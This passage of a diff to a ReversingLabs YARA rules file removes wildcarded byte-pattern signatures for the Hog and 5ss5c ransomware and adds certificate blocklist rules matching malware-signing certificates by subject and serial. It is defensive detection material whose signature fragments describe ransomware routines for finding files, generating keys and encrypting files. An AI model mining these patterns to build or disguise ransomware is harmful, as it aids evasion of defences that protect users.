-        }
-		$find_files_p1 = {
-            73 ?? ?? ?? ?? 0A 06 72 ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 06 72 ?? ?? ?? ?? 72
-            ?? ?? ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 2D ?? 72 ?? ?? ?? ?? 28 ?? ??
-            ?? ?? 2C ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 73 ?? ?? ?? ?? 0C 28 ?? ?? ?? ?? 16 28 ?? ??
-            ?? ?? 02 8E 39 ?? ?? ?? ?? 02 16 9A 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 39 ?? ?? ?? ?? 16 0D
-            28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ?? 17 0D 20 ?? ?? ?? ??
-            28 ?? ?? ?? ?? 1F ?? 1B 28 ?? ?? ?? ?? 25 6F ?? ?? ?? ?? 13 ?? 6F ?? ?? ?? ?? 13 ?? 28
-            ?? ?? ?? ?? 72 ?? ?? ?? ?? 08 20 ?? ?? ?? ?? 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 12 ??
-            28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 11 ?? 28 ?? ?? ?? ?? 25 11 ?? 16 11
-            ?? 8E 69 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 16 8D ?? ?? ?? ?? 13 ?? 1C 8D ?? ?? ?? ?? 25 16
-            72 ?? ?? ?? ?? A2 25 17 72 ?? ?? ?? ?? A2 25 18 72 ?? ?? ?? ?? A2 25 19 72 ?? ?? ?? ??
-            A2 25 1A 72 ?? ?? ?? ?? A2 25 1B 72 ?? ?? ?? ?? A2 13 ?? 1F ?? 8D ?? ?? ?? ?? 25 16 72
-            ?? ?? ?? ?? A2 25 17 72 ?? ?? ?? ?? A2 25 18 72 ?? ?? ?? ?? A2 25 19 72 ?? ?? ?? ?? A2
-            25 1A 72 ?? ?? ?? ?? A2 25 1B 72 ?? ?? ?? ?? A2 25 1C 72 ?? ?? ?? ?? A2 25 1D 72 ?? ??
-            ?? ?? A2 25 1E 72 ?? ?? ?? ?? A2 25 1F ?? 72 ?? ?? ?? ?? A2 25 1F ?? 72
-        }
-		$find_files_p2 = {
-            A2 13 ?? 1F ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 28 ?? ?? ?? ?? 6F ??
-            ?? ?? ?? 6F ?? ?? ?? ?? 1C 32 ?? 11 ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 13 ??
-            16 13 ?? 38 ?? ?? ?? ?? 11 ?? 11 ?? 9A 13 ?? 11 ?? 72 ?? ?? ?? ?? 11 ?? 28 ?? ?? ?? ??
-            72 ?? ?? ?? ?? 17 28 ?? ?? ?? ?? 13 ?? 16 13 ?? 2B ?? 11 ?? 11 ?? 9A 13 ?? 11 ?? 13 ??
-            16 13 ?? 2B ?? 11 ?? 11 ?? 9A 13 ?? 11 ?? 72 ?? ?? ?? ?? 11 ?? 28 ?? ?? ?? ?? 6F ?? ??
-            ?? ?? 2C ?? 12 ?? 11 ?? 8E 69 17 58 28 ?? ?? ?? ?? 11 ?? 11 ?? 16 6F ?? ?? ?? ?? 11 ??
-            A2 2B
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $find_files_p* ) ) and ( all of ( $encrypt_files_p* ) ) and ( $internal_encrypt_file )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Yuanyuan Zhang" and pe.signatures [ i ] . serial == "0c:50:1b:8b:11:32:09:c9:6c:81:19:cf:7a:6b:8b:79" and 1474329600 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Hog : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_0300Ee4A4C52443147821A8186D04309 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Hog ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "b4f26acf-5ff1-5c49-8cfa-8f619af84efd"
-		date = "2021-10-12"
-		modified = "2021-10-12"
+		id = "abccf84f-ba18-5644-897c-d23a228facff"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/ByteCode.MSIL.Ransomware.Hog.yara#L1-L70"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L13512-L13528"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "c5cbc79fee9083ed3befa6b0d348f2d38064bb9012b8f0ca11afd7137243866d"
+		logic_hash = "8476ece98427c1ffd99d820c25fe664397de2c393473f7d5ee0846d8d840fd9e"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Hog"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$generate_key = {
-            73 ?? ?? ?? ?? 0A 73 ?? ?? ?? ?? 0B 1A 8D ?? ?? ?? ?? 0C 2B ?? 07 08 6F ?? ?? ?? ?? 08
-            16 28 ?? ?? ?? ?? 0D 06 72 ?? ?? ?? ?? 09 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 5E 28 ?? ?? ??
-            ?? 6F ?? ?? ?? ?? 26 02 25 17 59 10 ?? 16 30 ?? 06 6F ?? ?? ?? ?? 13 ?? DE ?? 07 2C ??
-            07 6F ?? ?? ?? ?? DC 11 ?? 2A
-        }
-		$find_files = {
-            16 7E ?? ?? ?? ?? 73 ?? ?? ?? ?? 0A 06 16 16 6F ?? ?? ?? ?? 2D ?? DD ?? ?? ?? ?? 00 1F
-            ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 80 ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? ??
-            ?? ?? 80 ?? ?? ?? ?? 73 ?? ?? ?? ?? 0B 07 72 ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ??
-            6F ?? ?? ?? ?? 20 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 7E ??
-            ?? ?? ?? 6F ?? ?? ?? ?? 17 31 ?? 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 25 2D ?? 26 7E ?? ?? ??
-            ?? FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 25 80 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 0C
-            2B ?? 08 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 08 6F ?? ?? ?? ?? 2D ?? DE ?? 08 2C ?? 08 6F ??
-            ?? ?? ?? DC 28 ?? ?? ?? ?? DE ?? 07 2C ?? 07 6F ?? ?? ?? ?? DC DE ?? 26 28 ?? ?? ?? ??
-            DE ?? 06 2C ?? 06 6F ?? ?? ?? ?? DC 2A
-        }
-		$encrypt_files_p1 = {
-            02 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 3A ?? ?? ?? ?? 02 73 ?? ?? ?? ?? 6F ?? ?? ?? ?? 7E ??
-            ?? ?? ?? 31 ?? DD ?? ?? ?? ?? 73 ?? ?? ?? ?? 0A 06 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ??
-            ?? ?? ?? 06 1F ?? 8D ?? ?? ?? ?? 25 D0 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 02 19
-            73 ?? ?? ?? ?? 0B 02 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0C 08 06 6F ?? ?? ??
-            ?? 17 73 ?? ?? ?? ?? 0D 08 06 6F ?? ?? ?? ?? 16 06 6F ?? ?? ?? ?? 8E 69 6F ?? ?? ?? ??
-            07 09 6F ?? ?? ?? ?? DE ?? 09 2C ?? 09 6F ?? ?? ?? ?? DC DE ?? 08 2C ?? 08 6F ?? ?? ??
-            ?? DC DE ?? 07 2C ?? 07 6F ?? ?? ?? ?? DC DE ?? 06 2C ?? 06 6F ?? ?? ?? ?? DC 02 28 ??
-            ?? ?? ?? DE ?? 26 DE ?? 2A
-        }
-		$encrypt_files_p2 = {
-            73 ?? ?? ?? ?? 0A 06 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 06 1F ?? 8D ?? ?? ??
-            ?? 25 D0 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 02 6F ?? ?? ?? ?? 0B
-            73 ?? ?? ?? ?? 0C 08 06 6F ?? ?? ?? ?? 17 73 ?? ?? ?? ?? 0D 09 07 16 07 8E 69 6F ?? ??
-            ?? ?? 09 6F ?? ?? ?? ?? DE ?? 09 2C ?? 09 6F ?? ?? ?? ?? DC 08 6F ?? ?? ?? ?? 28 ?? ??
-            ?? ?? 10 ?? DE ?? 08 2C ?? 08 6F ?? ?? ?? ?? DC 02 13 ?? DE ?? 06 2C ?? 06 6F ?? ?? ??
-            ?? DC 26 DE ?? 02 2A 11 ?? 2A
-        }
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Buster Ind Com Imp e Exp de Acessorios P Autos Ltda" and pe.signatures [ i ] . serial == "03:00:ee:4a:4c:52:44:31:47:82:1a:81:86:d0:43:09" and 1494892800 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_202Cf8 : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "1c442ed6-a48a-52f4-b345-300428ec9c76"
+		date = "2020-08-05"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L13530-L13546"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
+		logic_hash = "671a4b522761fdff75d1c0c608e8cfb21c7ab538c8c30c8620315bc58ed358e6"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( $generate_key ) and ( all of ( $encrypt_files_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DATALINE LTD." and pe.signatures [ i ] . serial == "20:2c:f8" and 1087841761 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_5Ss5C : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_6651Cc8B4850D4Dec61961503Ea7956B : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects 5ss5c ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "c69f44de-8e48-518d-87bf-d21d11223a2f"
-		date = "2020-06-26"
-		modified = "2020-07-15"
+		id = "88679114-9c85-5810-af21-d5c2a8dc759e"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.5ss5c.yara#L1-L267"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L13548-L13564"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "74fcec568906a01dade7091c63cffbe4afa49c4705d9c1f21d10b4eee655a805"
+		logic_hash = "29bfe9c8b340b55a9daa2644e8d55b2b783cc95c85541732e6e0decca8c10ff6"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "5ss5c"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$find_files_p1 = {
-            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ??
-            33 C5 89 45 ?? 53 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 8B FA 89 BD ?? ?? ?? ?? 8B F1
-            8B 5D ?? 33 C0 89 9D ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 45 ?? 89 45 ?? 6A ?? 89 45 ??
-            89 45 ?? 89 45 ?? E8 ?? ?? ?? ?? 89 45 ?? 8D 4D ?? 83 C4 ?? C7 00 ?? ?? ?? ?? C7 40
-            ?? ?? ?? ?? ?? 8B 45 ?? 89 08 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ??
-            57 8D 8D ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 6A ?? C7 45 ??
-            ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? 8D 4D
-            ?? C7 00 ?? ?? ?? ?? C7 40 ?? ?? ?? ?? ?? 8B 45 ?? 89 08 C7 45 ?? ?? ?? ?? ?? C7 45
-            ?? ?? ?? ?? ?? C6 45 ?? ?? C6 45 ?? ?? 6A ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ??
-            ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? 8D 4D ?? C7 00 ?? ?? ?? ?? C7 40 ??
-            ?? ?? ?? ?? 8B 45 ?? 89 08 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? C6
-            45 ?? ?? 6A ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ??
-            ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 83 C4 ?? C7
-            00 ?? ?? ?? ?? C7 40 ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 08 C7 85 ?? ?? ?? ?? ?? ??
-            ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 0F 57 C0 8B 43 ?? 66 0F D6
-        }
-		$find_files_p2 = {
-            45 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 89 45 ?? C6 45
-            ?? ?? 8B 3B 85 FF 74 ?? 6A ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ??
-            ?? 8B 47 ?? 8D 8D ?? ?? ?? ?? 89 45 ?? 8D 45 ?? 89 47 ?? 89 7D ?? E8 ?? ?? ?? ?? 6A
-            ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 3B
-            C8 74 ?? 83 78 ?? ?? 8D 48 ?? 72 ?? 8B 09 FF 70 ?? 51 8D 8D ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 83 BD ?? ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 0F 43 85 ?? ?? ?? ?? 51
-            50 FF 15 ?? ?? ?? ?? 8B C8 89 8D ?? ?? ?? ?? 83 F9 ?? 0F 84 ?? ?? ?? ?? 8B D8 66 66
-            0F 1F 84 00 ?? ?? ?? ?? 80 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 83 7D ?? ?? 8D 45 ??
-            8B 8D ?? ?? ?? ?? 0F 43 45 ?? C7 45 ?? ?? ?? ?? ?? C6 00 ?? 8D 41 ?? 83 79 ?? ?? 72
-            ?? 8B 00 FF 71 ?? 8D 4D ?? 50 E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8B C8 E8 ?? ?? ??
-            ?? 8D 8D ?? ?? ?? ?? 8B D0 8D 79 ?? 8A 01 41 84 C0 75 ?? 2B CF 8D 85 ?? ?? ?? ?? 51
-            50 8B CA E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B D8 F6 85 ??
-            ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 33 FF FF B7 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 85
-            C0 0F 85 ?? ?? ?? ?? 83 C7 ?? 81 FF ?? ?? ?? ?? 72 ?? 68 ?? ?? ?? ?? 50 8D 85 ?? ??
-            ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 45 ?? ?? 8D 85 ??
-            ?? ?? ?? 8B 9D ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 6A ?? 83 CB ?? C7 85 ?? ?? ?? ?? ?? ??
-            ?? ?? 50 89 9D ?? ?? ?? ?? 89 5D ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? C7
-        }
-		$find_files_p3 = {
-            45 ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 6A ?? 8B 40 ?? C7 84 05 ?? ?? ?? ?? ?? ?? ?? ??
-            8B 85 ?? ?? ?? ?? 8B 48 ?? 8D 41 ?? 89 84 0D ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 51 6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 85 C0 75
-            ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 6A ?? 8B 40 ?? 03 C8 33 C0 39 41 ?? 0F 94 C0
-            8D 04 85 ?? ?? ?? ?? 0B 41 ?? 50 E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 55 ?? 83 7D ?? ?? 8D
-            8D ?? ?? ?? ?? FF 75 ?? 0F 43 55 ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 6A ?? 8B
-            40 ?? 03 C8 33 C0 39 41 ?? 0F 94 C0 8D 04 85 ?? ?? ?? ?? 0B 41 ?? 50 E8 ?? ?? ?? ??
-            8B 5D ?? 8D 55 ?? 53 FF B5 ?? ?? ?? ?? 8B CE E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 8B 85 ??
-            ?? ?? ?? 8B 40 ?? 85 FF 0F 85 ?? ?? ?? ?? C7 84 05 ?? ?? ?? ?? ?? ?? ?? ?? 8B 85 ??
-            ?? ?? ?? 8B 48 ?? 8D 41 ?? 89 84 0D ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B
-            85 ?? ?? ?? ?? 8B 40 ?? C7 84 05 ?? ?? ?? ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 48 ??
-            8D 41 ?? 89 84 0D ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C6 45 ?? ?? 50 C7 85 ?? ?? ?? ?? ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? C6 45 ?? ?? E9 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 8D 51
-            ?? 0F 1F 80 ?? ?? ?? ?? 8A 01 41 84 C0 75 ?? 2B CA 8D 85 ?? ?? ?? ?? 51 50 8D 4D
-        }
-		$find_files_p4 = {
-            E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 8D 51 ?? 8A 01 41 84 C0 75 ?? 2B CA 8D 85 ?? ?? ??
-            ?? 51 50 8D 4D ?? E8 ?? ?? ?? ?? 83 EC ?? 8D 45 ?? 83 7D ?? ?? 8B FC 0F 43 45 ?? C7
-            07 ?? ?? ?? ?? C7 47 ?? ?? ?? ?? ?? 89 47 ?? C6 45 ?? ?? 8B 5D ?? 85 DB 74 ?? 6A ??
-            8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B CF E8 ?? ?? ?? ?? 8B 43 ?? 8D 8D ?? ?? ?? ?? 89
-            47 ?? 89 7B ?? 89 1F E8 ?? ?? ?? ?? 8B 45 ?? 8D 4D ?? 83 EC ?? 83 7D ?? ?? 8B FC 0F
-            43 4D ?? 03 C1 C7 07 ?? ?? ?? ?? C7 47 ?? ?? ?? ?? ?? 89 47 ?? C6 45 ?? ?? 8B 5D ??
-            85 DB 74 ?? 6A ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B CF E8 ?? ?? ?? ?? 8B 43 ?? 8D
-            8D ?? ?? ?? ?? 89 47 ?? 89 7B ?? 89 1F E8 ?? ?? ?? ?? 83 EC ?? 8D 45 ?? 83 7D ?? ??
-            8B FC 0F 43 45 ?? C7 07 ?? ?? ?? ?? C7 47 ?? ?? ?? ?? ?? 89 47 ?? C6 45 ?? ?? 8B 5D
-            ?? 85 DB 74 ?? 6A ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B CF E8 ?? ?? ?? ?? 8B 43 ??
-            8D 8D ?? ?? ?? ?? 89 47 ?? 89 7B ?? 89 1F E8 ?? ?? ?? ?? BA ?? ?? ?? ?? C6 45
-        }
-		$find_files_p5 = {
-            8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ??
-            ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ??
-            ?? 8D 55 ?? 83 7D ?? ?? 8B 4D ?? 0F 43 55 ?? C7 45 ?? ?? ?? ?? ?? 89 4D ?? 83 F9 ??
-            72 ?? 49 83 C8 ?? 3B C8 89 4D ?? 0F 42 C1 03 C2 0F 1F 40 ?? 80 38 ?? 75 ?? 0F B6 08
-            80 F9 ?? 75 ?? 33 C9 EB ?? 1B C9 83 C9 ?? 85 C9 74 ?? 3B C2 74 ?? 48 EB ?? 2B C2 EB
-            ?? 83 C8 ?? 6A ?? 8D 78 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ??
-            ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ??
-            83 C4 ?? C7 00 ?? ?? ?? ?? C7 40 ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 08 C6 45 ?? ??
-            8B 45 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ??
-            ?? ?? 3B C7 0F 82 ?? ?? ?? ?? 2B C7 C7 45 ?? ?? ?? ?? ?? 83 C9 ?? 89 45 ?? 83 F8 ??
-            0F 42 C8 83 7D ?? ?? 8D 45 ?? 0F 43 45 ?? 51 03 C7 8D 8D ?? ?? ?? ?? 50 E8 ?? ?? ??
-            ?? 83 8D ?? ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 8D 85 ?? ?? ??
-            ?? FF B5 ?? ?? ?? ?? 8D 4D ?? 50 E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D
-        }
-		$find_files_p6 = {
-            8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 EC ?? 8D 45 ?? 83 7D ?? ?? 8B FC 0F 43 45 ?? C7 07
-            ?? ?? ?? ?? C7 47 ?? ?? ?? ?? ?? 89 47 ?? C6 45 ?? ?? 8B 5D ?? 85 DB 74 ?? 6A ?? 8D
-            8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B CF E8 ?? ?? ?? ?? 8B 43 ?? 8D 8D ?? ?? ?? ?? 89 47
-            ?? 89 7B ?? 89 1F E8 ?? ?? ?? ?? 8B 45 ?? 8D 4D ?? 83 EC ?? 83 7D ?? ?? 8B FC 0F 43
-            4D ?? 03 C1 C7 07 ?? ?? ?? ?? C7 47 ?? ?? ?? ?? ?? 89 47 ?? C6 45 ?? ?? 8B 5D ?? 85
-            DB 74 ?? 6A ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B CF E8 ?? ?? ?? ?? 8B 43 ?? 8D 8D
-            ?? ?? ?? ?? 89 47 ?? 89 7B ?? 89 1F E8 ?? ?? ?? ?? 83 EC ?? 8D 45 ?? 83 7D ?? ?? 8B
-            FC 0F 43 45 ?? C7 07 ?? ?? ?? ?? C7 47 ?? ?? ?? ?? ?? 89 47 ?? C6 45 ?? ?? 8B 5D ??
-            85 DB 74 ?? 6A ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B CF E8 ?? ?? ?? ?? 8B 43 ?? 8D
-            8D ?? ?? ?? ?? 89 47 ?? 89 7B ?? 89 1F E8 ?? ?? ?? ?? BA ?? ?? ?? ?? C6 45 ?? ?? 8D
-            8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ??
-            ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ??
-            33 FF 66 66 0F 1F 84 00 ?? ?? ?? ?? 83 7D ?? ?? 8D 45 ?? FF B7 ?? ?? ?? ?? 0F 43 45
-            ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ?? ?? ?? 83 7D ?? ?? 8D 45 ?? 68 ?? ??
-            ?? ?? 0F 43 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ?? ?? ?? 83 C7 ?? 83 FF
-            ?? 72 ?? 8B 5D ?? 85 DB 0F 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ??
-            ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 8B 46 ?? 8D 4D ?? 51 39 46 ?? 74 ?? 8B C8 E8 ?? ?? ??
-            ?? 8B 7E ?? 8D 8D ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 8B 0E 8D 41 ?? F7 D9 1B C9 23 C8
-        }
-		$find_files_p7 = {
-            74 ?? 8B 01 85 C0 74 ?? 39 78 ?? 72 ?? 77 ?? C7 00 ?? ?? ?? ?? 8B 01 8B 40 ?? 89 01
-            EB ?? 8D 48 ?? 8B 01 85 C0 75 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 46 ?? ?? EB ??
-            50 8B CE E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ??
-            85 C0 75 ?? 8B 46 ?? 8D 4D ?? 51 39 46 ?? 74 ?? 8B C8 E8 ?? ?? ?? ?? 8B 7E ?? 8D 8D
-            ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 8B 0E 8D 41 ?? F7 D9 1B C9 23 C8 74 ?? 8B 01 85 C0
-            74 ?? 66 0F 1F 44 00 ?? 39 78 ?? 72 ?? 77 ?? C7 00 ?? ?? ?? ?? 8B 01 8B 40 ?? 89 01
-            EB ?? 8D 48 ?? 8B 01 85 C0 75 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 46 ?? ?? EB ??
-            50 8B CE E8 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ??
-            ?? ?? 83 8D ?? ?? ?? ?? ?? 8B D8 8B 7D ?? 85 FF 74 ?? 8B 3F 8B CB E8 ?? ?? ?? ?? 3B
-        }
-		$find_files_p8 = {
-            C7 74 ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? E8
